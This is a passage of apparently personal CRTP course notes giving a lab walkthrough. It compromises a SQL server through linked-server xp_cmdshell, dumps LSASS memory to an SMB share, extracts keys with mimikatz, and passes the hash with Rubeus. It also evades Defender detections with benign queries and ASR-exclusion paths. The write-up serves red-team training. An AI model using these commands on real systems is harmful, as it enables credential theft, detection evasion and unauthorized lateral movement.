Certified Red Team Professional (CRTP) - Notes
HomeGitHubPortfolioTwitter/XMediumCont@ct
  • 📝Certified Red Team Professional (CRTP) - Notes
    • ℹ️0 - Course Summary
    • 1️⃣1 - Active Directory (AD)
      • 1.1 - Introduction to Active Directory (AD)
      • 1.2 - Physical Components of AD
      • 1.3 - Logical Components of AD
    • 2️⃣2 - PowerShell
      • 2.1 - Introduction to PowerShell
      • 2.2 - Security and Detection
    • 3️⃣3 - AD Enumeration
      • 3.1 - Host & User Identification
      • 3.2 - Common Services Enum
        • 3.2.1 - LDAP & DNS Enum
        • 3.2.2 - SMB Enum & Common Attacks
      • 3.3 - Domain Enumeration
        • 3.3.1 - PowerView
          • 3.3.1.1 - Domain Enumeration (Video Lab)
        • 3.3.2 - BloodHound
    • 4️⃣4 - Trust and Privileges Mapping
      • 4.1 - Access Control (ACL/ACE)
      • 4.2 - Group Policy
      • 4.3 - Trusts
    • 5️⃣5 - Local Privilege Escalation
      • 5.1 - Privilege Escalation
        • 5.1.1 - Feature Abuse
        • 5.1.2 - Relaying
        • 5.1.3 - GPO Abuse
        • 5.1.4 - Unquoted Service Path
      • 5.2 - Tools
    • 7️⃣6 - Lateral Movement
      • 6.1 - PowerShell Remoting & Tradecraft
      • 6.2 - Credentials Extraction & Mimikatz
    • 9️⃣7 - Kerberos Attack and Privelege Escalation
      • 7.1 - Kerberos Intro
      • 7.2 - User Enum in Kerberos
      • 7.3 - AS-REP Roasting
      • 7.4 - Kerberoasting
      • 7.5 - Kerberos Delegation
        • Uncostrained Delegation
        • Constrained Delegation
      • 7.6 - Accross Trusts
        • Page
        • External Trust
        • Forest
        • Domain Trust
    • 8️⃣8 - Persistence
      • 8.1 - Golden Ticket
      • 8.2 - Silver Ticket
      • 8.3 - Diamond Ticket
      • 8.4 - Skeleton Key
      • 8.5 - DSRM
      • 8.6 - Custom SSP
      • 8.7 - Persistence via ACLs
        • 8.7.1 - AdminSDHolder
        • 8.7.2 - DCSync Attack
        • 8.7.3 - Security Descriptors
    • 9️⃣9 - Detection and Defense
    • Lab
      • 0 - Lab Instructions
      • 1 - LO 1️
      • 2 - LO2️
      • 3 - LO 3️
      • 4 - LO 4️
      • 5 - LO 5️
      • 6 - LO 6️
      • 7 - LO 7️
      • 8 - LO8️
      • 9 - LO9️
      • 10 - LO1️0️
      • 11 - LO1️1️
      • 12 - LO1️2️
      • 13 - LO1️3️
      • 14 - LO1️4️
      • 15 - LO1️5️
      • 16 - LO1️6️
      • 17 - LO1️7️
      • 18 - LO1️8️
      • 19 - LO1️9️
      • 20 - LO2️0️
      • 21 - LO2️1️
      • 22 - LO 2️2️
      • 23 - LO2️3️
    • 📄Report
      • How to write a PT Report
  • 🛣️RoadMap / Exam Preparation
  • 📔CRTP Cheat Sheet
Powered by GitBook
On this page
  • Tasks
  • Solutions
  • 1 - Compromise eu-sqlx again. Use opsec friendly alternatives to bypass MDE and MDI
  1. Certified Red Team Professional (CRTP) - Notes
  2. Lab

23 - LO2️3️

Learning Object 23

Previous22 - LO 2️2️NextReport

Last updated 16 days ago

Tasks

1 - Compromise eu-sqlx again. Use opsec friendly alternatives to bypass MDE and MDI

Solutions

1 - Compromise eu-sqlx again. Use opsec friendly alternatives to bypass MDE and MDI

Continuing from the previous Learning Objective, we have ability to run commands as SYSTEM on eusqlx. This is perfect to leverage to perfrom an LSASS dump to further gain persistent credential access to the machine.

To dump the memory of LSASS process, we can begin by leveraging minidumpdotnet as it is undetected by AV / MDE since it uses a custom implementation of the MiniDumpWriteDump() API call.

Tools Transfer and Execution

Downloads over HTTP increase the chances of detection chained with other risky actions so we perfrom execution from an SMB share. We serve the minidumpdotnet and FindLSASSPID (to enumerate LSASS PID) on our studentVM share named - studentsharex (C:\AD\Tool\studentsharex).

On the student VM, create an SMB share called - studentsharex with the following configuration: Allow Everyone, Guest and ANONYMOUS LOGON to the permissions of the share.

Note: To make it easier in the lab we have enabled Guest access for the fileshares so that eu-sqlx can access our studentsharex. Note that your student machine name could also be dcorp-std867

copy C:\AD\Tools\minidumpdotnet.exe \\dcorp-std867\studentshare867
copy C:\AD\Tools\FindLSASSPID.exe \\dcorp-std867\studentshare867

LSASS DUMP using Custom APIs

Next, begin by performing SQL crawl xp_cmdshell execution on eu-sqlx to enumerate the LSASS PID using FindLSASSPID.exe. Start a PowerShell session using InvisiShell, import PowerUpSQL and run the following command:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
Import-Module C:\AD\Tools\PowerUpSQL-master\PowerupSQL.psd1
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''\\dcorp-student867.dollarcorp.moneycorp.local\studentshare867\FindLSASSPID.exe''' -QueryTarget eu-sql45
Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student867
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL45.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL45
CustomQuery : System.Data.DataRow
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL45.EU.EUROCORP.LOCAL}
User        : sa
Links       :

NOTE: LSASS PID will be different for each LAB instance.

To break a detection chain, we will run benign queries. In case of MDE, in our experience waiting for about 10 minutes also helps in avoiding detection.

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'SELECT @@version' -QueryTarget eu-sql45
Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student867
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL45.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL45
CustomQuery : System.Data.DataRow
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL45.EU.EUROCORP.LOCAL}
User        : sa
Links       :

We can now perform an LSASS dump using the minidumpdotnet tool.

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''\\dcorp-studentx.dollarcorp.moneycorp.local\studentshare867\minidumpdotnet.exe 712 \\dcorp-student867.dollarcorp.moneycorp.local\studentshare867\monkey867.dmp ''' -QueryTarget eu-sql45
Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student867
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL45.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL45
CustomQuery : {The network path was not found., }
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL45.EU.EUROCORP.LOCAL}
User        : sa
Links       :

Perform another benign query for safe measure to break any detection chain

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'SELECT * FROM master.dbo.sysdatabases' -QueryTarget eu-sql45
Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\student867
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQL45.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQL45
CustomQuery : {master, tempdb, model, msdb}
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL45.EU.EUROCORP.LOCAL}
User        : sa
Links       :

Back on our studentvm we can now begin to parse the exfiltrated LSASS minidump (monkey.dmp) using mimikatz as follows. Run the below command from an elevated shell (Run as administrator):

NOTE: If you encounter errors parsing the minidump file, most likely your student VM memory is full. Attempt a quick fix by logging in and out of the student VM.

C:\AD\Tools\mimikatz.exe "sekurlsa::minidump C:\AD\Tools\studentshare867\monkey867.dmp" "sekurlsa::ekeys" "exit"

Now, use Overpass-the-hash on the student VM using Rubeus to start a process with privileges of the dbadmin user who is a member of eu.eurocorp.local. Run the below command from a high integrity process on student VM (Run as administrator):

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:dbadmin /aes256:ef21ff273f16d437948ca755d010d5a1571a5bda62a0a372b29c703ab0777d4f /domain:eu.eurocorp.local /dc:eu-dc.eu.eurocorp.local /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Lateral Movement - ASR Rules Bypass

We can now use winrs to access eu-sqlx. Runthe below commands from the process spawned as dbadmin:

winrs -r:eu-sqlx.eu.eurocorp.local cmd
set username

Note that use of winrs is not detected by MDE but MDI (Microsoft Defender for Identity) detects it.

To avoid detection, we can use the WSManWinRM.exe tool. We will append an ASR exclusion such as "C:\Windows\ccmcache\" to avoid detections from the "Block process creations originating from PSExec and WMI commands" ASR rule. Run the below command from the process spawned as dbadmin:

NOTE: If the tool returns a value of 0, there is an error with command execution.

C:\AD\Tools\WSManWinRM.exe eu-sql867.eu.eurocorp.local "cmd /c set username C:\Windows\ccmcache\"

To see the command output, we can redirect the command to share on the student VM. This has very limited success and we are continuously trying ways to make it more effective.

C:\AD\Tools\WSManWinRM.exe eu-sql867.eu.eurocorp.local "cmd /c dir >> \\dcorp-student867.dollarcorp.moneycorp.local\studentshare867\out.txt C:\Windows\ccmcache\"
📝